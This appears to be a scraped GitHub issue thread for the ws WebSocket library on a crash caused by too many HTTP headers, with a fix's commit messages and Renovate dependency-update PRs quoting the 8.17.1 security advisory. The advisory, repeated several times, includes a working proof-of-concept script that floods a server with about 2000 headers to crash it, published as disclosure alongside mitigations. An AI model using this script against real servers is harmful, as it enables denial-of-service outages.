-
-
Notifications
You must be signed in to change notification settings - Fork 2.4k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Throws TypeError when there are too many HTTP headers #2230
Comments
Please create a minimal reproducible test case using only If the server |
Here is a test case to reproduce the issue using only Node.js core modules. const http = require('http');
const server = http.createServer();
server.maxHeadersCount = 1;
server.on('upgrade', function (request) {
console.log(request.headers);
});
server.listen(function () {
const { port } = server.address();
const request = http.request({
headers: {
foo: 'foo',
bar: 'bar',
baz: 'baz',
qux: 'qux',
connection: 'Upgrade',
upgrade: 'protocol'
},
host: '127.0.0.1',
port
});
request.end();
}); The |
If the number of headers exceed the `maxHeadersCount` threshold, `incomingMessage.headers.upgrade` can be `undefined`. Handle the case correctly and abort the handshake. Fixes #2230
See #2231. |
It is possible that the Upgrade header is correctly received and handled (the `'upgrade'` event is emitted) without its value being returned to the user. This can happen if the number of received headers exceed the `server.maxHeadersCount` or `request.maxHeadersCount` threshold. In this case `incomingMessage.headers.upgrade` may not be set. Handle the case correctly and abort the handshake. Fixes #2230
It is possible that the Upgrade header is correctly received and handled (the `'upgrade'` event is emitted) without its value being returned to the user. This can happen if the number of received headers exceed the `server.maxHeadersCount` or `request.maxHeadersCount` threshold. In this case `incomingMessage.headers.upgrade` may not be set. Handle the case correctly and abort the handshake. Fixes #2230
It is possible that the Upgrade header is correctly received and handled (the `'upgrade'` event is emitted) without its value being returned to the user. This can happen if the number of received headers exceed the `server.maxHeadersCount` or `request.maxHeadersCount` threshold. In this case `incomingMessage.headers.upgrade` may not be set. Handle the case correctly and abort the handshake. Fixes #2230
It is possible that the Upgrade header is correctly received and handled (the `'upgrade'` event is emitted) without its value being returned to the user. This can happen if the number of received headers exceed the `server.maxHeadersCount` or `request.maxHeadersCount` threshold. In this case `incomingMessage.headers.upgrade` may not be set. Handle the case correctly and abort the handshake. Fixes #2230
It is possible that the Upgrade header is correctly received and handled (the `'upgrade'` event is emitted) without its value being returned to the user. This can happen if the number of received headers exceed the `server.maxHeadersCount` or `request.maxHeadersCount` threshold. In this case `incomingMessage.headers.upgrade` may not be set. Handle the case correctly and abort the handshake. Fixes #2230
It is possible that the Upgrade header is correctly received and handled (the `'upgrade'` event is emitted) without its value being returned to the user. This can happen if the number of received headers exceed the `server.maxHeadersCount` or `request.maxHeadersCount` threshold. In this case `incomingMessage.headers.upgrade` may not be set. Handle the case correctly and abort the handshake. Fixes #2230
[![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com) This PR contains the following updates: | Package | Change | Age | Adoption | Passing | Confidence | |---|---|---|---|---|---| | [ws](https://togithub.com/websockets/ws) | [`8.17.0` -> `8.17.1`](https://renovatebot.com/diffs/npm/ws/8.17.0/8.17.1) | [![age](https://developer.mend.io/api/mc/badges/age/npm/ws/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://developer.mend.io/api/mc/badges/adoption/npm/ws/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://developer.mend.io/api/mc/badges/compatibility/npm/ws/8.17.0/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/ws/8.17.0/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | --- > [!WARNING] > Some dependencies could not be looked up. Check the Dependency Dashboard for more information. --- ### Release Notes <details> <summary>websockets/ws (ws)</summary> ### [`v8.17.1`](https://togithub.com/websockets/ws/releases/tag/8.17.1) [Compare Source](https://togithub.com/websockets/ws/compare/8.17.0...8.17.1) ### Bug fixes - Fixed a DoS vulnerability ([#​2231](https://togithub.com/websockets/ws/issues/2231)). A request with a number of headers exceeding the[`server.maxHeadersCount`][server.maxHeadersCount] threshold could be used to crash a ws server. ```js const http = require('http'); const WebSocket = require('ws'); const server = http.createServer(); const wss = new WebSocket.Server({ server }); server.listen(function () { const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split(''); const headers = {}; let count = 0; for (let i = 0; i < chars.length; i++) { if (count === 2000) break; for (let j = 0; j < chars.length; j++) { const key = chars[i] + chars[j]; headers[key] = 'x'; if (++count === 2000) break; } } headers.Connection = 'Upgrade'; headers.Upgrade = 'websocket'; headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ=='; headers['Sec-WebSocket-Version'] = '13'; const request = http.request({ headers: headers, host: '127.0.0.1', port: server.address().port }); request.end(); }); ``` The vulnerability was reported by [Ryan LaPointe](https://togithub.com/rrlapointe) in [https://github.com/websockets/ws/issues/2230](https://togithub.com/websockets/ws/issues/2230). In vulnerable versions of ws, the issue can be mitigated in the following ways: 1. Reduce the maximum allowed length of the request headers using the [`--max-http-header-size=size`][--max-http-header-size=size] and/or the [`maxHeaderSize`][maxHeaderSize] options so that no more headers than the `server.maxHeadersCount` limit can be sent. 2. Set `server.maxHeadersCount` to `0` so that no limit is applied. [`--max-http-header-size=size`]: https://nodejs.org/api/cli.html#--max-http-header-sizesize [`maxHeaderSize`]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener [`server.maxHeadersCount`]: https://nodejs.org/api/http.html#servermaxheaderscount </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://developer.mend.io/github/X-oss-byte/Canary-nextjs).
[![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com) This PR contains the following updates: | Package | Change | Age | Adoption | Passing | Confidence | |---|---|---|---|---|---| | [ws](https://togithub.com/websockets/ws) | [`8.17.0` -> `8.17.1`](https://renovatebot.com/diffs/npm/ws/8.16.0/8.17.1) | [![age](https://developer.mend.io/api/mc/badges/age/npm/ws/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://developer.mend.io/api/mc/badges/adoption/npm/ws/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://developer.mend.io/api/mc/badges/compatibility/npm/ws/8.16.0/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/ws/8.16.0/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | --- ### Release Notes <details> <summary>websockets/ws (ws)</summary> ### [`v8.17.1`](https://togithub.com/websockets/ws/releases/tag/8.17.1) [Compare Source](https://togithub.com/websockets/ws/compare/8.17.0...8.17.1) ### Bug fixes - Fixed a DoS vulnerability ([#​2231](https://togithub.com/websockets/ws/issues/2231)). A request with a number of headers exceeding the[`server.maxHeadersCount`][server.maxHeadersCount] threshold could be used to crash a ws server. ```js const http = require('http'); const WebSocket = require('ws'); const server = http.createServer(); const wss = new WebSocket.Server({ server }); server.listen(function () { const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split(''); const headers = {}; let count = 0; for (let i = 0; i < chars.length; i++) { if (count === 2000) break; for (let j = 0; j < chars.length; j++) { const key = chars[i] + chars[j]; headers[key] = 'x'; if (++count === 2000) break; } } headers.Connection = 'Upgrade'; headers.Upgrade = 'websocket'; headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ=='; headers['Sec-WebSocket-Version'] = '13'; const request = http.request({ headers: headers, host: '127.0.0.1', port: server.address().port }); request.end(); }); ``` The vulnerability was reported by [Ryan LaPointe](https://togithub.com/rrlapointe) in [https://github.com/websockets/ws/issues/2230](https://togithub.com/websockets/ws/issues/2230). In vulnerable versions of ws, the issue can be mitigated in the following ways: 1. Reduce the maximum allowed length of the request headers using the [`--max-http-header-size=size`][--max-http-header-size=size] and/or the [`maxHeaderSize`][maxHeaderSize] options so that no more headers than the `server.maxHeadersCount` limit can be sent. 2. Set `server.maxHeadersCount` to `0` so that no limit is applied. [`--max-http-header-size=size`]: https://nodejs.org/api/cli.html#--max-http-header-sizesize [`maxHeaderSize`]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener [`server.maxHeadersCount`]: https://nodejs.org/api/http.html#servermaxheaderscount ### [`v8.17.0`](https://togithub.com/websockets/ws/releases/tag/8.17.0) [Compare Source](https://togithub.com/websockets/ws/compare/8.16.0...8.17.0) ### Features - The `WebSocket` constructor now accepts the `createConnection` option ([#​2219](https://togithub.com/websockets/ws/issues/2219)). ### Other notable changes - The default value of the `allowSynchronousEvents` option has been changed to `true` ([#​2221](https://togithub.com/websockets/ws/issues/2221)). This is a breaking change in a patch release. The assumption is that the option is not widely used. </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://developer.mend.io/github/X-oss-byte/Nextjs).
[![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com) This PR contains the following updates: | Package | Type | Update | Change | OpenSSF | |---|---|---|---|---| | [@prisma/adapter-neon](https://togithub.com/prisma/prisma) ([source](https://togithub.com/prisma/prisma/tree/HEAD/packages/adapter-neon)) | dependencies | patch | [`5.15.0` -> `5.15.1`](https://renovatebot.com/diffs/npm/@prisma%2fadapter-neon/5.15.0/5.15.1) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/prisma/prisma/badge)](https://securityscorecards.dev/viewer/?uri=github.com/prisma/prisma) | | [@prisma/client](https://www.prisma.io) ([source](https://togithub.com/prisma/prisma/tree/HEAD/packages/client)) | dependencies | patch | [`5.15.0` -> `5.15.1`](https://renovatebot.com/diffs/npm/@prisma%2fclient/5.15.0/5.15.1) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/prisma/prisma/badge)](https://securityscorecards.dev/viewer/?uri=github.com/prisma/prisma) | | [@storybook/addon-a11y](https://togithub.com/storybookjs/storybook/tree/next/code/addons/a11y) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/addons/a11y)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2faddon-a11y/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) | | [@storybook/addon-essentials](https://togithub.com/storybookjs/storybook/tree/next/code/addons/essentials) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/addons/essentials)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2faddon-essentials/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) | | [@storybook/addon-interactions](https://togithub.com/storybookjs/storybook/tree/next/code/addons/interactions) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/addons/interactions)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2faddon-interactions/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) | | [@storybook/addon-links](https://togithub.com/storybookjs/storybook/tree/next/code/addons/links) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/addons/links)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2faddon-links/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) | | [@storybook/addon-viewport](https://togithub.com/storybookjs/storybook/tree/next/code/addons/viewport) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/addons/viewport)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2faddon-viewport/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) | | [@storybook/blocks](https://togithub.com/storybookjs/storybook/tree/next/code/ui/blocks) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/ui/blocks)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2fblocks/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) | | [@storybook/nextjs](https://togithub.com/storybookjs/storybook/tree/next/code/frameworks/nextjs) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/frameworks/nextjs)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2fnextjs/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) | | [@storybook/react](https://togithub.com/storybookjs/storybook/tree/next/code/renderers/react) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/renderers/react)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2freact/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) | | [@storybook/test](https://togithub.com/storybookjs/storybook/tree/next/code/lib/test) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/lib/test)) | dependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/@storybook%2ftest/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) | | [@types/node](https://togithub.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/node) ([source](https://togithub.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/node)) | devDependencies | patch | [`20.14.2` -> `20.14.5`](https://renovatebot.com/diffs/npm/@types%2fnode/20.14.2/20.14.5) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/DefinitelyTyped/DefinitelyTyped/badge)](https://securityscorecards.dev/viewer/?uri=github.com/DefinitelyTyped/DefinitelyTyped) | | [@typescript-eslint/eslint-plugin](https://typescript-eslint.io/packages/eslint-plugin) ([source](https://togithub.com/typescript-eslint/typescript-eslint/tree/HEAD/packages/eslint-plugin)) | devDependencies | patch | [`7.13.0` -> `7.13.1`](https://renovatebot.com/diffs/npm/@typescript-eslint%2feslint-plugin/7.13.0/7.13.1) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/typescript-eslint/typescript-eslint/badge)](https://securityscorecards.dev/viewer/?uri=github.com/typescript-eslint/typescript-eslint) | | [@typescript-eslint/parser](https://typescript-eslint.io/packages/parser) ([source](https://togithub.com/typescript-eslint/typescript-eslint/tree/HEAD/packages/parser)) | devDependencies | patch | [`7.13.0` -> `7.13.1`](https://renovatebot.com/diffs/npm/@typescript-eslint%2fparser/7.13.0/7.13.1) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/typescript-eslint/typescript-eslint/badge)](https://securityscorecards.dev/viewer/?uri=github.com/typescript-eslint/typescript-eslint) | | [knip](https://knip.dev) ([source](https://togithub.com/webpro-nl/knip/tree/HEAD/packages/knip)) | devDependencies | minor | [`5.19.0` -> `5.21.2`](https://renovatebot.com/diffs/npm/knip/5.19.0/5.21.2) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/webpro-nl/knip/badge)](https://securityscorecards.dev/viewer/?uri=github.com/webpro-nl/knip) | | [nextjs-routes](https://togithub.com/tatethurston/nextjs-routes) | dependencies | patch | [`2.2.0` -> `2.2.1`](https://renovatebot.com/diffs/npm/nextjs-routes/2.2.0/2.2.1) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/tatethurston/nextjs-routes/badge)](https://securityscorecards.dev/viewer/?uri=github.com/tatethurston/nextjs-routes) | | [pnpm](https://pnpm.io) ([source](https://togithub.com/pnpm/pnpm)) | packageManager | minor | [`9.3.0` -> `9.4.0`](https://renovatebot.com/diffs/npm/pnpm/9.3.0/9.4.0) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/pnpm/pnpm/badge)](https://securityscorecards.dev/viewer/?uri=github.com/pnpm/pnpm) | | [prisma](https://www.prisma.io) ([source](https://togithub.com/prisma/prisma/tree/HEAD/packages/cli)) | devDependencies | patch | [`5.15.0` -> `5.15.1`](https://renovatebot.com/diffs/npm/prisma/5.15.0/5.15.1) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/prisma/prisma/badge)](https://securityscorecards.dev/viewer/?uri=github.com/prisma/prisma) | | [storybook](https://togithub.com/storybookjs/storybook/tree/next/code/lib/cli) ([source](https://togithub.com/storybookjs/storybook/tree/HEAD/code/lib/cli)) | devDependencies | patch | [`8.1.9` -> `8.1.10`](https://renovatebot.com/diffs/npm/storybook/8.1.9/8.1.10) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/storybookjs/storybook/badge)](https://securityscorecards.dev/viewer/?uri=github.com/storybookjs/storybook) | | [tsx](https://tsx.is) ([source](https://togithub.com/privatenumber/tsx)) | devDependencies | patch | [`4.15.4` -> `4.15.6`](https://renovatebot.com/diffs/npm/tsx/4.15.4/4.15.6) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/privatenumber/tsx/badge)](https://securityscorecards.dev/viewer/?uri=github.com/privatenumber/tsx) | | [type-fest](https://togithub.com/sindresorhus/type-fest) | devDependencies | patch | [`4.20.0` -> `4.20.1`](https://renovatebot.com/diffs/npm/type-fest/4.20.0/4.20.1) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/sindresorhus/type-fest/badge)](https://securityscorecards.dev/viewer/?uri=github.com/sindresorhus/type-fest) | | [ws](https://togithub.com/websockets/ws) | dependencies | patch | [`8.17.0` -> `8.17.1`](https://renovatebot.com/diffs/npm/ws/8.17.0/8.17.1) | [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/websockets/ws/badge)](https://securityscorecards.dev/viewer/?uri=github.com/websockets/ws) | --- ### Release Notes <details> <summary>prisma/prisma (@​prisma/adapter-neon)</summary> ### [`v5.15.1`](https://togithub.com/prisma/prisma/releases/tag/5.15.1) [Compare Source](https://togithub.com/prisma/prisma/compare/5.15.0...5.15.1) Today, we are issuing the `5.15.1` patch release. #### Fixes in Prisma Client - [internal error: entered unreachable code](https://togithub.com/prisma/prisma/issues/23407) - [Got error 'internal error: entered unreachable code' when trying to perform an upsert.](https://togithub.com/prisma/prisma/issues/22947) - [Prisma Client errors on SQLite with internal error: entered unreachable code when running 2 concurrent upsert ](https://togithub.com/prisma/prisma/issues/22725) - [`ConnectionError(Timed out during query execution.)` during seeding](https://togithub.com/prisma/prisma/issues/21772) - [SQLite timeouts after upgrade from prisma 2 to prisma 4](https://togithub.com/prisma/prisma/issues/17029) - [`ConnectionError(Timed out during query execution.)` error when using `Promise.all` for SQLite](https://togithub.com/prisma/prisma/issues/11789) - [Improve the error when SQLite database file is locked](https://togithub.com/prisma/prisma/issues/10403) - [sqlite timeout error multiple queries run one after another](https://togithub.com/prisma/prisma/issues/10306) - [SQLite times out during query execution when using `Promise.all()` / concurrent](https://togithub.com/prisma/prisma/issues/9562) - [internal error: entered unreachable code](https://togithub.com/prisma/prisma/issues/24511) </details> <details> <summary>storybookjs/storybook (@​storybook/addon-a11y)</summary> ### [`v8.1.10`](https://togithub.com/storybookjs/storybook/blob/HEAD/CHANGELOG.md#8110) [Compare Source](https://togithub.com/storybookjs/storybook/compare/v8.1.9...v8.1.10) - Addon-interactions: Fix deprecation warnings - [#​28250](https://togithub.com/storybookjs/storybook/pull/28250), thanks [@​shilman](https://togithub.com/shilman)! - Test: Upgrade deps of [@​storybook/test](https://togithub.com/storybook/test) - [#​27862](https://togithub.com/storybookjs/storybook/pull/27862), thanks [@​kasperpeulen](https://togithub.com/kasperpeulen)! </details> <details> <summary>typescript-eslint/typescript-eslint (@​typescript-eslint/eslint-plugin)</summary> ### [`v7.13.1`](https://togithub.com/typescript-eslint/typescript-eslint/blob/HEAD/packages/eslint-plugin/CHANGELOG.md#7131-2024-06-17) [Compare Source](https://togithub.com/typescript-eslint/typescript-eslint/compare/v7.13.0...v7.13.1) ##### 🩹 Fixes - **eslint-plugin:** \[prefer-readonly] refine report locations - **eslint-plugin:** \[return-await] support explicit resource management - **eslint-plugin:** \[no-unsafe-member-access] differentiate a types-error any from a true any ##### ❤️ Thank You - Kirk Waiblinger - Yukihiro Hasegawa You can read about our [versioning strategy](https://main--typescript-eslint.netlify.app/users/versioning) and [releases](https://main--typescript-eslint.netlify.app/users/releases) on our website. </details> <details> <summary>typescript-eslint/typescript-eslint (@​typescript-eslint/parser)</summary> ### [`v7.13.1`](https://togithub.com/typescript-eslint/typescript-eslint/blob/HEAD/packages/parser/CHANGELOG.md#7131-2024-06-17) [Compare Source](https://togithub.com/typescript-eslint/typescript-eslint/compare/v7.13.0...v7.13.1) This was a version bump only for parser to align it with other projects, there were no code changes. You can read about our [versioning strategy](https://main--typescript-eslint.netlify.app/users/versioning) and [releases](https://main--typescript-eslint.netlify.app/users/releases) on our website. </details> <details> <summary>webpro-nl/knip (knip)</summary> ### [`v5.21.2`](https://togithub.com/webpro-nl/knip/compare/5.21.1...bd77bcce5acfdd108ab54398c922eb03f07fc65f) [Compare Source](https://togithub.com/webpro-nl/knip/compare/5.21.1...5.21.2) ### [`v5.21.1`](https://togithub.com/webpro-nl/knip/releases/tag/5.21.1) [Compare Source](https://togithub.com/webpro-nl/knip/compare/5.21.0...5.21.1) - Fix lockfile-lint config filename ([#​683](https://togithub.com/webpro-nl/knip/issues/683)) ([`f5304b6`](https://togithub.com/webpro-nl/knip/commit/f5304b6d)) - feat: add command to ignored binaries ([#​682](https://togithub.com/webpro-nl/knip/issues/682)) ([`d049b6c`](https://togithub.com/webpro-nl/knip/commit/d049b6c4)) - Add (custom) og img for sponsors page ([`d89ec12`](https://togithub.com/webpro-nl/knip/commit/d89ec129)) - Rename `NOT_FOUND` to `KNIP_ADDED` workspace names ([`3a41f8e`](https://togithub.com/webpro-nl/knip/commit/3a41f8ec)) ### [`v5.21.0`](https://togithub.com/webpro-nl/knip/releases/tag/5.21.0) [Compare Source](https://togithub.com/webpro-nl/knip/compare/5.20.0...5.21.0) - Add webdriver-io plugin ([`7414dc1`](https://togithub.com/webpro-nl/knip/commit/7414dc1a)) - Update plugin docs ([`df35b9f`](https://togithub.com/webpro-nl/knip/commit/df35b9f4)) - Minor housekeeping ([`1422c9d`](https://togithub.com/webpro-nl/knip/commit/1422c9d2)) - Add size-limit plugin ([`dbd82f8`](https://togithub.com/webpro-nl/knip/commit/dbd82f87)) - Add lockfile-lint plugin ([`d70d0de`](https://togithub.com/webpro-nl/knip/commit/d70d0de7)) - Use provided name in plugin template ([`43961f9`](https://togithub.com/webpro-nl/knip/commit/43961f91)) - Minor housekeeping ([`c81b1a2`](https://togithub.com/webpro-nl/knip/commit/c81b1a23)) - Update readme with badges and stuff ([`c18fcba`](https://togithub.com/webpro-nl/knip/commit/c18fcba5)) - Update docs (Configuring Project Files) ([`e10ac2e`](https://togithub.com/webpro-nl/knip/commit/e10ac2e4)) ### [`v5.20.0`](https://togithub.com/webpro-nl/knip/releases/tag/5.20.0) [Compare Source](https://togithub.com/webpro-nl/knip/compare/5.19.0...5.20.0) - Lockfile ([`e929847`](https://togithub.com/webpro-nl/knip/commit/e9298477)) - Edit doc ([`5afaac4`](https://togithub.com/webpro-nl/knip/commit/5afaac44)) - More consistent usage of fg ([`25cbba0`](https://togithub.com/webpro-nl/knip/commit/25cbba0a)) - Eliminiate custom TS System instance ([#​680](https://togithub.com/webpro-nl/knip/issues/680)) ([`d7325c6`](https://togithub.com/webpro-nl/knip/commit/d7325c69)) - Go against the grain in the cypress plugin ([`ef2464d`](https://togithub.com/webpro-nl/knip/commit/ef2464d5)) - Remove duplicate code ([`6a17ad2`](https://togithub.com/webpro-nl/knip/commit/6a17ad29)) - Add simple-git-hooks plugin ([#​679](https://togithub.com/webpro-nl/knip/issues/679)) ([`9129af7`](https://togithub.com/webpro-nl/knip/commit/9129af70)) - Add missing `root` property to vitest ([#​677](https://togithub.com/webpro-nl/knip/issues/677)) ([`6797bf8`](https://togithub.com/webpro-nl/knip/commit/6797bf8d)) - Update some dependencies ([`7c9b645`](https://togithub.com/webpro-nl/knip/commit/7c9b6455)) - Update docs ([`1c9361f`](https://togithub.com/webpro-nl/knip/commit/1c9361f3)) - Make TS-style path mappings work for all files with extensions ([#​673](https://togithub.com/webpro-nl/knip/issues/673)) ([`e9b3e66`](https://togithub.com/webpro-nl/knip/commit/e9b3e669)) </details> <details> <summary>tatethurston/nextjs-routes (nextjs-routes)</summary> ### [`v2.2.1`](https://togithub.com/tatethurston/nextjs-routes/blob/HEAD/CHANGELOG.md#221) [Compare Source](https://togithub.com/tatethurston/nextjs-routes/compare/v2.2.0...v2.2.1) - Fix route generation on Windows. See [#​187](https://togithub.com/tatethurston/nextjs-routes/issues/187). Thanks [@​AkanoCA](https://togithub.com/AkanoCA)! </details> <details> <summary>pnpm/pnpm (pnpm)</summary> ### [`v9.4.0`](https://togithub.com/pnpm/pnpm/compare/v9.3.0...v9.4.0) [Compare Source](https://togithub.com/pnpm/pnpm/compare/v9.3.0...v9.4.0) </details> <details> <summary>privatenumber/tsx (tsx)</summary> ### [`v4.15.6`](https://togithub.com/privatenumber/tsx/releases/tag/v4.15.6) [Compare Source](https://togithub.com/privatenumber/tsx/compare/v4.15.5...v4.15.6) ##### Bug Fixes - minimum Node version in warning for `module.register()` ([#​592](https://togithub.com/privatenumber/tsx/issues/592)) ([cb27d4d](https://togithub.com/privatenumber/tsx/commit/cb27d4dfe7670e6cf50f09b48cbd37ac73aa064a)) *** This release is also available on: - [npm package (@​latest dist-tag)](https://www.npmjs.com/package/tsx/v/4.15.6) ### [`v4.15.5`](https://togithub.com/privatenumber/tsx/releases/tag/v4.15.5) [Compare Source](https://togithub.com/privatenumber/tsx/compare/v4.15.4...v4.15.5) ##### Bug Fixes - **cjs:** make transformers overwritable ([c22fa7d](https://togithub.com/privatenumber/tsx/commit/c22fa7d1a90fa34983caddda91b5c1c10e1a4b6c)) *** This release is also available on: - [npm package (@​latest dist-tag)](https://www.npmjs.com/package/tsx/v/4.15.5) </details> <details> <summary>sindresorhus/type-fest (type-fest)</summary> ### [`v4.20.1`](https://togithub.com/sindresorhus/type-fest/releases/tag/v4.20.1) [Compare Source](https://togithub.com/sindresorhus/type-fest/compare/v4.20.0...v4.20.1) - `Schema`: Fix handling of arrays ([#​887](https://togithub.com/sindresorhus/type-fest/issues/887)) [`c570ec2`](https://togithub.com/sindresorhus/type-fest/commit/c570ec2) - `Paths`: Prevent infinite recursion ([#​891](https://togithub.com/sindresorhus/type-fest/issues/891)) [`7d4e875`](https://togithub.com/sindresorhus/type-fest/commit/7d4e875) </details> <details> <summary>websockets/ws (ws)</summary> ### [`v8.17.1`](https://togithub.com/websockets/ws/releases/tag/8.17.1) [Compare Source](https://togithub.com/websockets/ws/compare/8.17.0...8.17.1) ### Bug fixes - Fixed a DoS vulnerability ([#​2231](https://togithub.com/websockets/ws/issues/2231)). A request with a number of headers exceeding the[`server.maxHeadersCount`][server.maxHeadersCount] threshold could be used to crash a ws server. ```js const http = require('http'); const WebSocket = require('ws'); const server = http.createServer(); const wss = new WebSocket.Server({ server }); server.listen(function () { const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split(''); const headers = {}; let count = 0; for (let i = 0; i < chars.length; i++) { if (count === 2000) break; for (let j = 0; j < chars.length; j++) { const key = chars[i] + chars[j]; headers[key] = 'x'; if (++count === 2000) break; } } headers.Connection = 'Upgrade'; headers.Upgrade = 'websocket'; headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ=='; headers['Sec-WebSocket-Version'] = '13'; const request = http.request({ headers: headers, host: '127.0.0.1', port: server.address().port }); request.end(); }); ``` The vulnerability was reported by [Ryan LaPointe](https://togithub.com/rrlapointe) in [https://github.com/websockets/ws/issues/2230](https://togithub.com/websockets/ws/issues/2230). In vulnerable versions of ws, the issue can be mitigated in the following ways: 1. Reduce the maximum allowed length of the request headers using the [`--max-http-header-size=size`][--max-http-header-size=size] and/or the [`maxHeaderSize`][maxHeaderSize] options so that no more headers than the `server.maxHeadersCount` limit can be sent. 2. Set `server.maxHeadersCount` to `0` so that no limit is applied. 